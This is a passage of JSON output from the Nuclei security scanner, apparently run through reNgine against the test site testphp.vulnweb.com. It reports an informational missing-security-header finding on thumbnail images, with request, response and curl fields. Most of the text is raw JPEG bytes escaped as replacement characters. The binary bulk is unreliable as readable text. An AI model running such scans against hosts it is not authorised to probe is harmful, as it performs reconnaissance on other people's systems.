\\ufffd\\ufffdv\\ufffd\\ufffdH\\u0004\\u000b\\ufffd\\u0016y=,\\ufffd\\ufffd\\ufffd\\u0014\\ufffd\\\"x\\ufffd\\u0002\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdJ\\ufffd\\u0005J\\ufffd\\u003c\\ufffd$\\ufffd\\u0004U^Dح\\ufffdכ\\u001dc\\ufffdc\\u001aK\\ufffd\\ufffdK_\\ufffd\\ufffd\\ufffd9^\\u0018\\ufffdW\\ufffdaZ\\ufffd]\\ufffd\\ufffdԶ’\\u0002\\ufffdT\\ufffd\\u0006(y\\ufffd\\ufffd\\u000f\\ufffd\\ufffd\\ufffd9c\\u001c\\u003c\\ufffd\\u0014\\ufffd\\ufffd\\ufffd,\\ufffdt\\ufffd\\ufffdY\\ufffd\\ufffd_o\\u0019\\u0016\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd7\\ufffd\\ufffdb\\ufffdT\\ufffd\\ufffdcma\\ufffd\\ufffdq\\ufffdY\\ufffd^\\u0017\\ufffd\\ufffdN#V+\\ufffdq\\ufffd.\\ufffdC\\\"\\ufffd\\ufffd\\ufffdL\\u0008\\ufffdM\\ufffd\\ufffd:\\u0002~\\ufffdk\\ufffd|\\ufffd}\\ufffdxA\\ufffd*\\ufffd\\ufffd\\ufffd8\\ufffd\\ufffd\\ufffd\\ufffdY\\u00022\\ufffd*\\ufffd\\u0004\\n6\\ufffd\\ufffd\\u0001\\ufffd\\u0003\\ufffd\\ufffd\\ufffd\\u000e+\\ufffdI\\u001e\\ufffdT\\u0004\\u0006\\ufffd*\\ufffdt\\ufffd/8Xb\\ufffd\\ufffd\\u000c\\ufffdakr\\ufffd\\ufffdV4\\ufffd\\ufffd$\\ufffd\\ufffd\\ufffdCvp\\ufffd\\ufffd.W\\ufffd\\u0008\\u001a\\u0000\\ufffd\\r\\ufffd\\ufffd5F\\u0016\\ufffd7F\\ufffdo[\\ufffd\\u001d\\ufffd#\\ufffd\\ufffdw}1\\ufffd\\ufffdn\\u0010MHٛ\\ufffd\\ufffd\\ufffdk\\ufffd\\ufffdL\\ufffd,\\u0000Z\\ufffd\\ufffd\\u0005\\u0014Esȫ\\u0007\\ufffd:x\\ufffdk\\ufffdU\\ufffd\\ufffdh\\ufffd~ߘ\\ufffd\\ufffd\\ufffd^*\\ufffd\\ufffd\\u0019\\ufffd\\ufffd8X\\ufffd\\ufffd\\ufffd|x4L:\\ufffdGa\\ufffd\\ufffd\\ufffd\\ufffd]Z\\ufffd\\u001b,jC9\\ufffd!\\ufffd\\u001e\\u0008\\ufffd\\ufffd\\ufffd\\ufffdŞVaL\\ufffd\\ufffd\\ufffdQg9~p\\u000c\\ufffd\\ufffd+\\ufffd\\ufffd\\ufffd\\u0019\\ufffd\\u001a\\ufffd\\ufffdl\\ufffdp\\ufffd\\u0018\\ufffd\\u0000Q\\ufffd\\u000c1'F\\u0018a\\ufffd$g\\u0018\\ufffd\\u0018c\\u0014\\ufffdu\\u001d\\ufffd\\ufffdo\\ufffd\\u0018bR\\ufffd\\ufffd\\ufffd\\u0018`\\ufffdF\\u0018a\\ufffd$a\\ufffd\\u0018\\ufffdFr\\ufffd\\u0018bF\\ufffda\\ufffd\\u0018(\\ufffd\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:17.142530096Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.50' 'http://testphp.vulnweb.com/pictures/5.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-permitted-cross-domain-policies\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/4.jpg.tn\",\"path\":\"/pictures/4.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/4.jpg.tn\",\"request\":\"GET /pictures/4.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; CrOS aarch64 13597.84.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 4615\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:41:58 GMT\\r\\nEtag: \\\"4dca64a1-1207\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001c\\u0000\\u0000\\u0002\\u0003\\u0001\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0004\\u0005\\u0000\\u0003\\u0006\\u0002\\u0001\\u0007\\u0008\\ufffd\\ufffd\\u00005\\u0010\\u0000\\u0002\\u0002\\u0001\\u0003\\u0003\\u0002\\u0005\\u0002\\u0005\\u0003\\u0005\\u0001\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011\\u0004\\u0000\\u0012!\\u00051A\\u0013Q\\u0006\\\"aq\\ufffd\\u0014\\ufffd#2B\\ufffd\\ufffdR\\ufffd\\ufffd%3\\ufffd\\ufffd\\ufffdb\\ufffd\\ufffd\\u0000\\u001a\\u0001\\u0000\\u0002\\u0003\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0003\\u0000\\u0002\\u0005\\u0004\\u0006\\ufffd\\ufffd\\u00000\\u0011\\u0000\\u0002\\u0002\\u0001\\u0003\\u0001\\u0006\\u0005\\u0003\\u0005\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0000\\u0003\\u0011\\u0012!1A\\u0004\\u0013\\\"2Qq\\u0005a\\ufffd\\ufffd\\ufffd3\\ufffd\\ufffd\\u0014#Rb\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000K4\\ufffd5\\ufffd\\ufffd\\ufffd\\u001d\\ufffdÔ\\u0012I\\ufffd?\\ufffd#Y6\\ufffd\\ufffd^\\ufffds`\\u001f\\ufffd\\ufffd# 2\\ufffd#Ag\\ufffd\\ufffd\\u0026V\\u0016\\u000f\\ufffd\\ufffd\\ufffd\\u0000:\\ufffd\\ufffd\\ufffd\\ufffd'\\ufffd\\ufffd\\ufffd02t\\ufffd\\ufffd\\u003e\\u001cnX3P\\ufffdW\\ufffd\\ufffd\\u0000s\\ufffd\\ufffdD\\ufffd-\\ufffd\\ufffd\\ufffd#\\ufffd\\u00268\\ufffd3\\ufffd\\ufffd\\ufffdq\\ufffd\\u0011\\ufffdA\\ufffd4\\t\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd0+\\ufffd\\ufffd\\ufffdF\\ufffd!\\ufffd4\\ufffd\\\"\\ufffd\\ufffd#\\ufffd)c\\ufffd\\u0002\\ufffd\\u001b\\ufffdzTZ\\ufffd\\u0000\\ufffdWo\\u0015\\ufffd\\u003cs\\r\\ufffd\\ufffd\\u00159D\\ufffd\\ufffd\\u0026\\ufffd\\tRտ\\ufffd\\ufffd\\u000b\\ufffdkZ$\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffd\\ufffd\\u003e\\ufffd{\\ufffdrB\\ufffd2\\ufffd]\\ufffdU]\\ufffdwy \\u001f\\u001d\\ufffd\\ufffd\\ufffd\\u0010~\\ufffd\\r\\u0006\\ufffdK\\ufffd\\ufffdۊ\\ufffdk\\ufffd~\\ufffd\\ufffd\\u0000\\ufffd\\ufffd8\\u000f\\ufffd\\ufffd~fI\\t\\u001b\\ufffd\\u0015D\\u001e\\ufffd\\ufffd\\u0000\\ufffd\\u001d\\u003c\\ufffd+\\u0014(\\ufffd\\u0000\\u0000v\\u0002\\ufffdj\\u0003\\ufffd?(Xi\\ufffd|\\ufffd\\ufffdRZ\\u001e\\ufffdC\\ufffd\\ufffdo\\ufffd.\\u001e)w ! 3n\\u000b\\ufffd\\u0013E\\ufffd\\ufffd\\ufffdagU˔#BX\\ufffd\\u0002\\ufffd\\ufffd\\ufffd\\ufffd=M\\ufffd\\ufffd\\ufffd\\u001a\\ufffd}\\ufffd\\u0006\\ufffd\\u0002\\ufffd=\\ufffd\\u0000\\ufffd\\u001c\\ufffd\\ufffdca̭I\\ufffd\\ufffd\\ufffd!\\ufffd\\u0003\\u0000\\ufffdN\\ufffdY\\ufffd\\u0019\\ufffd0UdK\\ufffd\\ufffd\\u0008'\\ufffd\\ufffdU\\ufffd\\ufffd\\ufffd\\u0000\\ufffdm\\ufffd\\ufffd^\\u003e\\ufffdQ\\ufffd\\ufffd\\u0012*\\ufffd\\ufffdQ\\ufffd\\u000f\\u001ac\\u001c\\ufffd\\u0005\\ufffdF\\ufffd\\ufffd\\ufffd*\\ufffd\\\\\\ufffd4\\ufffd\\ufffd\\ufffd\\ufffdՆP\\u0007\\u003c~t\\ufffd\\ufffdU\\u0014\\ufffd2\\ufffd\\u003c\\ufffdgz\\ufffd\\ufffd\\u000f$Y\\ufffd\\ufffd\\ufffde\\ufffd\\u0000\\u0006\\ufffd?3\\u0003\\ufffd\\n\\u003cv\\ufffd\\ufffd\\ufffdX\\u000e`U,p\\u0026\\ufffd7\\ufffdC\\u0017\\ufffdcW\\u0006hP3/\\ufffd\\ufffd[=\\ufffd?\\ufffdf\\u001aL\\ufffd\\ufffd\\ufffd\\\"\\ufffd\\ufffdʑ\\ufffd\\ufffdr\\ufffd,\\ufffd\\u0015\\ufffd*\\ufffd\\u0008.\\ufffd\\\"\\ufffd$\\ufffd\\u0016{\\ufffd\\u0018=\\\"l\\ufffd\\ufffd\\ufffd\\ufffdv\\ufffd\\ufffdl\\ufffd\\u003c\\ufffdU#\\ufffd\\ufffdI\\ufffdr\\u0000\\ufffdx\\ufffd\\ufffdֶ\\ufffd/\\ufffdA\\ufffd\\u0015\\ufffdC\\ufffd BĒhj\\ufffd-\\ufffdg\\ufffd\\ufffd\\ufffd\\ufffd\\u0007\\ufffdГ4\\ufffd\\ufffd\\ufffdCL\\ufffd\\u0018\\u0008\\ufffd\\ufffd(\\ufffdh\\ufffd\\u000by\\u001c\\ufffdB\\ufffd\\u0017\\ufffdf\\u0026\\u003cpƱ\\ufffd\\u001a\\ufffd(\\ufffd\\ufffd(\\u0001\\ufffd5\\\\*\\u0005\\n\\ufffdq\\ufffd:\\ufffd\\ufffd\\u001bE\\u0016\\u0026\\\\\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdQ\\ufffd\\u0013\\ufffdutg\\ufffd\\ufffd}\\ufffd\\ufffd\\ufffd\\ufffd\\u0003\\ufffd\\ufffd\\u0019?\\ufffd\\ufffd\\t\\u0014\\ufffd\\ufffd@\\ufffd\\u001e,\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd鼓n]/\\ufffd\\ufffd\\ufffdU܄\\ufffd\\ufffd\\ufffdZ\\u0007\\ufffd\\ufffd:[\\ufffdԃdK\\u0004\\ufffd\\ufffde'bHl\\ufffd\\ufffd\\ufffds]\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd:\\u000e\\ufffd\\u001c\\ufffdގ\\ufffd9\\ufffd?\\ufffd\\ufffdU\\u0010\\ufffd)\\ufffd\\ufffd\\ufffd:\\ufffd\\u0003+P\\u0004\\ufffd\\ufffdaF\\ufffdX\\ufffd\\u003c\\u001b≩\\ufffd\\ufffd0A\\ufffd\\ufffd\\u0003\\ufffd\\ufffdX]O!\\ufffd\\u001a\\u0003\\ufffd\\ufffd\\ufffdA\\ufffdH\\ufffd\\ufffd\\ufffd\\ufffd6\\ufffd\\ufffd\\ufffd{\\u001f\\ufffdT6\\ufffdǬgvl\\ufffd\\u001e\\ufffd[\\ufffd\\ufffd\\ufffdX\\u001c\\ufffd\\ufffd\\ufffd\\u0000\\ufffd\\u0007=\\ufffd\\ufffd\\ufffdo\\ufffdM\\ufffd\\ufffd/}f\\ufffd\\ufffd\\ufffd\\ufffdW\\ufffd\\u0008n\\ufffd\\ufffd8\\ufffd\\ufffd\\ufffd\\u0016\\\"I\\ufffd/A\\u001b\\u0005\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\ufffduy\\\"\\u0000R\\ufffdŀ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\n\\u001cԺ\\ufffdt\\ufffd\\ufffd\\ufffd,\\u0000孨\\u0011\\ufffdP\\ufffdA\\ufffd\\r\\ufffd\\ufffd\\u001a+3;ч\\ufffd\\ufffdF;T{\\ufffd\\ufffd[\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0016\\ufffdV\\ufffd6\\ufffduL\\ufffd\\ufffde\\ufffd\\ufffd\\nۈ,YX\\ufffd\\ufffd\\ufffd?\\ufffd\\ufffdN:.*b@\\ufffd\\ufffd\\ufffd\\ufffdQ5}\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0007Ցi\\ufffd\\ufffd}\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\n;\\ufffd\\ufffdד\\ufffdh\\ufffd\\ufffd/\\ufffdӁ\\ufffd\\ufffd\\ufffd9hw\\u001f[\\ufffd\\ufffd\\ufffd\\\\\\\\92_w\\ufffd\\ufffd\\u0010\\ufffd\\ufffd\\u0018\\ufffd\\u000b\\ufffd\\ufffd\\u001f\\ufffd'\\ufffd\\ufffdw3\\ufffd\\ufffd8\\u0001Yop\\u0006ڂ\\ufffdl\\ufffd+C\\ufffd\\ufffd\\ufffd:\\ufffd\\ufffdr\\ufffdt`zLV\\ufffdA\\ufffd|\\u001f\\ufffd\\u0003\\ufffd\\ufffd\\u0002;\\u0017\\ufffdD\\ufffdmm\\ufffd\\ufffd\\ufffd\\u000c̾\\ufffd\\ufffd\\ufffd@\\ufffdB7)\\ufffd\\ufffd2\\ufffdH\\ufffd\\ufffdǛ\\ufffd\\\\\\u0011VF\\ufffd};\\ufffd'\\ufffd\\ufffdL*@ۈV4O\\ufffdߑu\\ufffd\\ufffdp1\\ufffd\\ufffdُ\\u0018E\\ufffdhw\\u003e\\ufffd\\ufffd?]\\u003c\\ufffd\\ufffd\\u001fM\\u0010\\ufffdL\\ufffdf\\ufffdSa\\u000cƌ\\n\\u0000}t|_\\ufffd\\ufffd\\ufffd15\\u0000F\\ufffd\\ufffd\\ufffd\\ufffd\\u000e\\ufffd\\u0015\\u000fSD\\u001d^\\ufffd\\\\\\ufffd\\ufffd\\t(\\u001cX\\ufffdj\\ufffd:\\ufffd:\\ufffd\\u000c\\ufffd\\u0018\\ufffdy\\u0007]\\ufffd\\u001fm#\\ufffd\\ufffd`\\ufffd\\ufffdS#*\\u0008\\ufffd@f\\u000e\\ufffd\\u0015_sΪ\\u001dy^L\\ufffd\\ufffd\\t\\ufffd1Ŵ\\ufffd\\ufffd\\ufffdk\\ufffd7|7\\u0015|}E\\ufffd\\ufffd\\ufffd#3\\ufffd#29\\ufffdr8`{Q\\ufffd΢\\u000f\\ufffd!\\ufffdF$e۸\\ufffd\\u0018Ճ\\ufffd\\ufffd\\u003cw\\u0014k\\ufffd\\ufffduFN\\u0013㱓\\r\\ufffdѰ\\ufffd\\ufffd\\u001d\\ufffd\\u0000\\ufffd·l\\ufffdU\\u0026\\ufffdr=\\ufffd\\ufffdGϿ\\ufffd\\ufffd\\ufffdͦ\\ufffd4\\ufffd:\\ufffd9\\ufffdC\\ufffd\\ufffd\\ufffdO\\ufffd\\ufffd\\u0015Z\\u0012|\\ufffd\\\\\\ufffd$\\ufffd\\u0016b\\u0015\\u0000bI \\n\\u001c\\ufffd\\u0000\\u0000\\ufffd\\ufffd^uT\\ufffd\\ufffdf!\\ufffd\\ufffd!\\ufffdV\\ufffd\\ufffdUoɮkށ5\\ufffd\\u001e\\ufffd\\t\\ufffdW\\ufffd3(,\\ufffd~`\\ufffdF\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdk,\\ufffd\\ufffd\\ufffdo4\\ufffd\\ufffdr80\\ufffd\\ufffd\\ufffd\\ufffd3\\ufffd\\ufffd7Uλ\\ufffd\\ufffd\\ufffd\\u0015\\u0001\\ufffd\\ufffd;\\ufffd\\u001et\\ufffdى\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0008\\u003eڂ^E\\ufffd\\ufffd\\ufffd\\ufffdM\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd@\\u001as\\ufffd=ŘC\\ufffd\\u0001\\ufffd(\\ufffdp\\ufffd˘ϐ\\ufffd\\ufffd\\ufffd)\\ufffd\\ufffd\\\"\\ufffd\\u003c\\ufffd0\\ufffdz\\ufffd7ȡ\\ufffd\\ufffd\\ufffd\\ufffdyI\\u0004b\\ufffd\\ufffd{\\ufffd\\ufffd8c\\ufffd\\ufffds=%A\\ufffd\\u0026h\\ufffdu\\ufffd-\\ufffd\\u0001\\ufffd\\ufffd\\ufffd3\\ufffd\\ufffdf\\ufffd\\u0011\\ufffd\\ufffd\\ufffdk\\ufffd#\\ufffd\\ufffd\\u0008\\u001d\\ufffd滊҈D\\ufffd\\ufffdz\\ufffd\\ufffd+\\ufffd\\ufffd\\ufffdO\\ufffd\\ufffdcP\\u0007a\\ufffdx\\u001fm\\u003c3Y\\ufffd\\ufffdg\\ufffd%\\u001b\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\\"a,\\ufffd|\\ufffd\\ufffd\\ufffdk\\u001e\\u0001\\ufffdkM\\ufffd\\u0015h\\u000eݴ\\ufffd\\u0019UG}^z\\ufffd\\u0011r\\ufffd(\\u001e\\ufffdk\\ufffd\\ufffd\\ufffd\\u0014N\\u0026f\\ufffd\\ufffd\\ufffd4p\\ufffd\\ufffd\\ufffd\\ufffd`\\u003c\\ufffd\\ufffd.\\u000f\\ufffdRf\\u000b\\u001cr\\ufffd\\ufffdLE\\ufffd\\ufffd\\u0004w\\ufffda\\ufffd\\u0013;\\ufffdd\\ufffd$X\\ufffd\\u0018\\ufffdo\\ufffd($\\ufffd\\ufffd\\ufffdA\\u001e\\ufffd\\ufffd\\ufffd\\\\\\ufffd\\ufffd\\ufffdt\\ufffd\\ufffd[\\ufffd\\ufffdq'P\\ufffd\\u0014/,\\ufffd\\ufffd\\ufffd\\ufffdI\\ufffd\\u001a\\u001e_\\ufffdq\\ufffd\\ufffd#74I`E-{\\ufffd?\\ufffd\\ufffdF\\ufffd\\u0011|?\\ufffd\\ufffd\\u001eJL\\u0015\\u000c\\ufffd\\ufffd.@!d\\u0003\\ufffd\\u0006\\ufffd\\ufffd\\ufffdoO\\ufffd\\ufffdme\\ufffd\\ufffdt\\ufffd\\ufffd1\\ufffd\\ufffd\\ufffd8 \\ufffd\\u00005\\ufffd\\u003e\\ufffd\\ufffd~u\\u0001c\\ufffdB\\ufffd93\\ufffd\\ufffd\\ufffd\\ufffdpS\\u0000\\u0019\\u0008\\ufffd\\ufffd\\ufffd\\u0003nu䊢;P\\ufffd\\ufffd\\ufffd\\ufffdS'\\u0026N\\ufffd\\ufffd2\\\"\\ufffd\\ufffd\\ufffd\\u0006W\\ufffd\\ufffdG\\ufffd\\u003c\\ufffd\\ufffd\\u0011‚ǎIZ\\ufffdl?\\ufffd\\ufffd\\u000f\\u001b\\u0010\\ufffd\\u0000\\u0005YV\\ufffdc\\u000cB\\ufffd\\u0015\\ufffd\\ufffd\\u001am\\ufffdӠ\\ufffd%H\\ufffdDU\\ufffdÿ\\ufffd\\ufffd\\ufffd\\r$\\ufffddր\\ufffdD\\ufffd\\ufffdbu\\u0003\\ufffd,\\ufffd2\\u001c\\ufffd\\ufffd匨X\\ufffd\\ufffd\\ufffd!,\\ufffd\\u0018\\ufffd\\u0017d\\u0011\\\\\\ufffd\\u001ac\\ufffd\\ufffd\\u001b\\ufffd\\ufffd\\ufffd\\ufffddIe\\ufffd(\\u001fP\\ufffdIT\\ufffdqUVŅ\\ufffd\\u003c\\u000f\\ufffd:\\ufffdE\\n\\ufffd8\\ufffdH\\ufffdx\\ufffdUm+\\ufffd\\u0006֟\\ufffd\\ufffd\\ufffdp\\ufffd_P\\ufffd'\\ufffd#\\ufffd\\ufffd\\u001a\\u0007*e\\ufffd9\\u0004r\\u0015\\u000e\\ufffd[k0\\ufffd\\ufffd}\\ufffdP~\\ufffdL\\ufffdV'\\u00042\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\ufffdA\\ufffdv\\ufffd\\ufffdH}x\\ufffd\\ufffd\\u0013_\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0019L\\ufffdB\\ufffd\\ufffdX\\ufffd\\ufffdB\\u0014\\u0005RV@K\\u0012\\ufffdKpG\\ufffd\\u0000\\u000bDrh\\ufffd\\ufffd3ʞN\\ufffdxZ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0006\\ufffd\\ufffdVyY\\ufffdo\\ufffdw\\u0010\\u0016\\ufffd\\ufffd\\u001a\\ufffd\\u0011L\\ufffd\\\"\\ufffd\\ufffd\\ufffd\\u0005\\u0004\\ufffds\\ufffd\\ufffds\\ufffd\\u003e\\ufffdy\\ufffdm6\\ufffd\\ufffd\\ufffd8\\ufffd\\ufffdK0\\ufffd\\\"X\\ufffd\\ufffd[Q\\ufffd\\u0016\\u000bE\\ufffd$\\ufffd#q\\ufffdg\\ufffd\\u001ck±\\ufffdĦ\\ufffd*\\ufffdһ\\ufffd\\u000cy#m\\u000e,\\u0000\\u00007\\ufffd6\\u0001\\ufffd\\ufffd}#\\ufffd\\u001c\\ufffd\\ufffd\\ufffd,\\ufffd\\ufffd\\ufffd\\ufffdU\\ufffd\\ufffd6ڀ\\ufffd\\ufffd\\ufffdFGs\\ufffd\\ufffd8\\u001bZ\\ufffdZڋ\\ufffdt\\ufffd\\u0017\\ufffd,\\ufffd\\u001a\\ufffd\\ufffdz\\ufffdWj7\\ufffd\\ufffd\\ufffdUR\\ufffd\\ufffds@\\ufffd\\u000e\\u0015\\u0012\\u000c\\ufffdA\\ufffdj\\ufffd\\ufffd\\ufffd\\ufffd\\u0013,H;\\ufffd%\\n\\ufffd\\ufffd\\u0016,_o\\ufffd\\ufffd\\ufffd^\\ufffd\\ufffd]\\ufffd0\\ufffdG\\ufffd6\\ufffd\\ufffd\\u0014\\ufffdn\\ufffd\\u001d\\ufffd\\u0000:\\ufffd*_\\\\\\ufffd\\ufffd1y\\ufffd|\\ufffd\\ufffd\\u0004aM\\ufffdv\\ufffdF\\ufffdB\\ufffd_j\\ufffd\\ufffd(\\ufffd\\u0006\\ufffd\\ufffdo^\\ufffd\\ufffd\\ufffd\\\\\\r\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd23\\u001e\\ufffde\\ufffd\\u001d\\u0013p\\u0004\\ufffd\\u0004\\ufffd\\u0007\\ufffd\\u003c\\u000f\\ufffd\\u001a\\ufffd3\\ufffd$\\u0003\\ufffd\\ufffd\\ufffd\\u0007\\ufffd\\ufffdm\\u0005\\ufffd\\u001cKF\\ufffd\\u003e羝c\\u0015\\u0015ڵ\\ufffd\\ufffd\\ufffd'\\u0013\\u001e\\ufffd\\ufffdv\\\\\\ufffd\\ufffd \\ufffd͖\\ufffd䊾\\ufffd(\\ufffd\\u003c\\ufffd\\ufffd8}\\u000e\\u0012\\ufffdg\\u0026m\\ufffd\\ufffd\\ufffd\\ufffd#\\ufffd\\ufffd\\u001f\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdu\\ufffd\\ufffd4Ǒx\\ufffdN\\u0015/]\\ufffds\\ufffd\\ufffd\\u000e\\ufffdohN/O\\ufffdy1!n9e\\ufffd\\ufffd7\\ufffd\\u0018\\ufffd(\\ufffd\\u0006\\ufffdǕ}\\ufffd\\ufffda\\u000c\\ufffd\\ufffd\\ufffd\\ufffd\\u0004\\ufffd\\ufffda\\n\\u0001㶎\\ufffd@ \\u001f\\ufffd\\ufffd\\ufffdƍ\\ufffd\\ufffd\\u0007Τ\\ufffd\\ufffd\\ufffd\\u0017\\ufffd\\u0010\\u0000@\\ufffd18\\ufffd\\ufffd\\u001d\\u0017\\u001bX\\u001e\\ufffdBH\\\\c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd܂4B\\u001e~\\ufffd\\\\։\\u0004\\ufffd\\ufffd?MP\\ufffd\\ufffdI\\r\\ufffd\\ufffdݹ\\ufffd\\ufffdz\\ufffd\\ufffd\\ufffdI\\ufffd wfc\\ufffd\\u0015\\u0014Y\\ufffd\\ufffd@\\u0000{\\u0001\\ufffd\\ufffd4ר.Yp\\ufffd4E\\n#\\ufffdV$|\\ufffd\\u001bo4l]\\u001e;\\ufffd\\ufffd\\ufffd̼KT2wT\\ufffd\\ufffd\\u0013\\ufffd\\u001b?1\\ufffd\\ufffd\\ufffd\\u001e\\u0007\\ufffdIuR\\u003c+7\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd!{\\u0010O\\ufffd\\u0013\\u000e\\ufffd3Y\\u0016D\\ufffdcb\\u0003\\ufffda[\\ufffd\\u0018X\\u0006\\ufffd\\ufffd\\u0001\\ufffdڹ\\u00122[a\\ufffd\\u0007\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000e\\\\,eґAU!@\\ufffd߸\\u001c\\ufffd\\u00007ި{k\\u000f\\ufffd\\ufffd}Y\\ufffd\\ufffd\\ufffd\\ufffd٢\\ufffd\\u000c\\u0018ϰ|\\u000f\\ufffd\\ufffd_\\u000f┃\\u001f\\ufffdފ%\\rD_'r\\ufffd\\ufffd\\u0004W\\u0017ߛ\\u0000\\ufffd1\\ufffd\\u0000\\u001bu\\u0015\\ufffd̝\\ufffd(\\ufffd\\ufffd]\\ufffdT\\u0016\\ufffdl\\ufffd\\ufffdLn\\ufffd\\ufffd\\u0015Wܒöc#v8\\ufffd9m\\\\\\ufffd\\ufffd\\u001bQ\\ufffdBֈ\\ufffd]\\ufffd\\ufffd^\\ufffd9\\u0001\\ufffd.ϕ\\ufffd\\ufffd\\ufffdN\\ufffdş\\ufffd\\ufffdן\\ufffd\\ufffd\\ufffdl\\ufffd\\u0026\\ufffd\\ufffd\\ufffd\\ufffdp72\\ufffd\\ufffdܮ\\t\\u001f\\ufffdT\\ufffd\\ufffdn;\\\\M\\u0005\\u0026\\ufffder\\ufffd\\u0006\\ufffdE\\ufffdn\\ufffdQ\\u003cv\\u003cX44:\\u0002Ɖ\\ufffd{\\ufffd\\ufffdh\\ufffd@G\\ufffd\\ufffdU\\ufffd\\ufffdQ\\ufffd\\ufffd\\ufffd1\\ufffdO\\ufffdY\\ufffdu\\ufffd\\ufffd0ر\\u0016p7\\u001d\\ufffd\\ufffd\\ufffd\\u0000^O\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd^\\ufffdWƂ\\ufffd,\\ufffdN\\ufffdN\\ufffd\\ufffd\\u0000I\\ufffdL\\ufffd:\\ufffd%\\t\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdd\\t\\ufffd\\u000cL\\ufffd\\ufffd\\ufffdP\\ufffd\\u001d\\u0016\\u001c\\ufffd#\\r1eC`m\\u000bb\\ufffd\\ufffdU\